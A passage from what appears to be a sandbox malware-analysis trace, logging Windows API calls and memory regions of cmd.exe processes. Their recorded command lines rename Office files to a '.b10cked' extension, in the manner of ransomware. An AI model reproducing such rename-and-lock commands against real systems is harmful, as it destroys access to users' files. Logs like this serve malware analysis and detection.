_String2=".") returned 65 [0172.635] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0172.635] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwv~1.trx")) returned 0x2020 [0172.636] SetErrorMode (uMode=0x0) returned 0x0 [0172.636] SetErrorMode (uMode=0x1) returned 0x0 [0172.636] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2af548, lpFilePart=0x2af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", lpFilePart=0x2af2e0*="OUTLWV~1.TRX") returned 0x3c [0172.636] SetErrorMode (uMode=0x0) returned 0x1 [0172.636] 
SetErrorMode (uMode=0x0) returned 0x0 [0172.636] SetErrorMode (uMode=0x1) returned 0x0 [0172.636] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af750, lpFilePart=0x2af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x2af2e0*="OUTLWVW.DLL.trx_dll.b10cked") returned 0x4b [0172.636] SetErrorMode (uMode=0x0) returned 0x1 [0172.636] SetLastError (dwErrCode=0x0) [0172.636] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll.b10cked")) returned 0xffffffff [0172.636] GetLastError () returned 0x2 [0172.636] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2aec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec5c) returned 0x82130 [0172.636] FindNextFileW (in: hFindFile=0x82130, lpFindFileData=0x2aec5c | out: lpFindFileData=0x2aec5c) returned 0 [0172.637] GetLastError () returned 0x12 [0172.637] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0172.638] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x81cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81cc0) returned 0x82130 [0172.638] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.638] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0172.638] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll")) returned 0x2020 [0172.638] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlwvw.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.639] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0172.639] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeea8 | out: _Buffer=" 1") returned 9 [0172.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.639] GetFileType (hFile=0x7) returned 0x2 [0172.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.639] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aee34 | out: lpMode=0x2aee34) returned 1 [0172.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aee68 | out: lpConsoleScreenBufferInfo=0x2aee68) returned 1 [0172.639] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.640] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aeea8 | out: lpBuffer=" 1 
file(s) moved.\r\n") returned 0x1a [0172.640] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aee8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aee8c*=0x1a) returned 1 [0172.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.640] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.640] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.640] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.640] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.640] SetConsoleInputExeNameW () returned 0x1 [0172.640] GetConsoleOutputCP () returned 0x1b5 [0172.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.640] exit (_Code=0) Process: id = "296" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23022 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23023 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23024 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23025 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 23026 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23027 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23028 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23029 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23030 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23031 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23393 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23394 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23395 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23396 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 23397 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 23398 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23399 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23400 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23401 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23402 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23403 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23404 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23405 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23406 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23407 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 23408 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23409 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23410 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23411 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23412 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23413 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23414 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23415 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" 
filename = "" Region: id = 23416 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 364 os_tid = 0x9ac [0172.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcd4 | out: lpSystemTimeAsFileTime=0x1cfcd4*(dwLowDateTime=0x9c8186a0, dwHighDateTime=0x1d440a9)) [0172.142] GetCurrentProcessId () returned 0x9bc [0172.142] GetCurrentThreadId () returned 0x9ac [0172.142] GetTickCount () returned 0x322ea [0172.143] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfccc | out: lpPerformanceCount=0x1cfccc*=22893175265) returned 1 [0172.143] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.143] __set_app_type (_Type=0x1) [0172.143] __p__fmode () returned 0x76b331f4 [0172.143] __p__commode () returned 0x76b331fc [0172.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.144] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.144] GetCurrentThreadId () returned 0x9ac [0172.144] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x38 [0172.144] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.144] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.144] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.144] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.144] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc64 | out: phkResult=0x1cfc64*=0x0) returned 0x2 [0172.145] VirtualQuery (in: lpAddress=0x1cfc9b, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0x1cf000, AllocationBase=0xd0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.145] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc34, dwLength=0x1c | out: lpBuffer=0x1cfc34*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0172.145] GetConsoleOutputCP () returned 0x1b5 [0172.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.145] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.146] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.150] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.150] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.151] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.151] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.151] GetEnvironmentStringsW () returned 0x260210* [0172.151] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.151] GetEnvironmentStringsW () returned 0x260210* [0172.151] FreeEnvironmentStringsW (penv=0x260210) returned 1 [0172.151] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebd4 | out: phkResult=0x1cebd4*=0x40) returned 0x0 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0xa0, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.151] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegCloseKey (hKey=0x40) returned 0x0 [0172.152] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebd4 | out: phkResult=0x1cebd4*=0x40) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x40, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x1, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x0, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x4, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x4) returned 0x0 [0172.152] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebdc, lpData=0x1cebe0, 
lpcbData=0x1cebd8*=0x1000 | out: lpType=0x1cebdc*=0x0, lpData=0x1cebe0*=0x9, lpcbData=0x1cebd8*=0x1000) returned 0x2 [0172.152] RegCloseKey (hKey=0x40) returned 0x0 [0172.152] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0172.152] srand (_Seed=0x5b886387) [0172.152] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" [0172.152] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"" [0172.152] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.153] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.153] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.153] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.153] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.153] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.153] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.153] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.153] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.153] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.153] GetEnvironmentStringsW () returned 0x262360* [0172.154] FreeEnvironmentStringsW (penv=0x262360) returned 1 [0172.154] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.154] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.154] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.154] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.154] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.154] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.154] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.154] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.154] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9a0, lpFilePart=0x1cf99c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf99c*="Desktop") returned 0x18 [0172.154] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.154] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.154] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.154] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.155] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.155] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf71c | out: lpFindFileData=0x1cf71c) returned 0x2609f0 [0172.155] FindClose (in: hFindFile=0x2609f0 | out: hFindFile=0x2609f0) returned 1 [0172.155] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.155] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.155] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.155] 